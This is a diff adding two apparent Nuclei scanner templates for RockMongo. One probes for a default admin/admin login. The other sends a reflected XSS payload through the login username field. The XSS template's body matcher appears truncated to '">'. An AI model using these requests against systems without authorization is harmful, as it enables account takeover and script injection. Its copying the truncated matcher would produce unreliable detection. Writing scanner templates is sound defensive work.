diff --git a/default-logins/rockmongo/rockmongo-default-credentials.yaml b/default-logins/rockmongo/rockmongo-default-credentials.yaml new file mode 100644 index 0000000000..22398d0a74 --- /dev/null +++ b/default-logins/rockmongo/rockmongo-default-credentials.yaml @@ -0,0 +1,31 @@ +id: rockmongo-default-credentials + +info: + name: Rockmongo Default Credentials + author: pikpikcu + severity: high + tags: rockmongo,dlogin + +requests: + - raw: + - | + POST /index.php?action=login.index HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Content-Type: application/x-www-form-urlencoded + Referer: {{Hostname}}/index.php?action=login.index + + more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3 + + matchers-condition: and + matchers: + + - type: word + words: + - "Location: /index.php?action=admin.index&host=0" + - "Set-Cookie: ROCK_LANG=" + part: header + + - type: status + status: + - 302 diff --git a/vulnerabilities/other/rockmongo-xss.yaml b/vulnerabilities/other/rockmongo-xss.yaml new file mode 100644 index 0000000000..d23d822656 --- /dev/null +++ b/vulnerabilities/other/rockmongo-xss.yaml @@ -0,0 +1,33 @@ +id: rockmongo-xss + +info: + name: RockMongo V1.1.8 XSS + author: pikpikcu + severity: medium + reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html + tags: rockmongo,xss + +requests: + - method: POST + path: + - "{{BaseURL}}/index.php?action=login.index" + headers: + Content-Type: application/x-www-form-urlencoded + body: "more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3" + + matchers-condition: and + matchers: + + - type: word + words: + - '">' + part: body + + - type: status + status: + - 200 + + - type: word + words: + - 'Content-Type: text/html' + part: header \ No newline at end of file